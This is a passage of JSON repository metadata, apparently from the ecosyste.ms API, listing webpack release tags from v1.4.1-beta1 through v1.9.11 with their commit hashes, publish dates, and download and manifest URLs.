ebpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","htm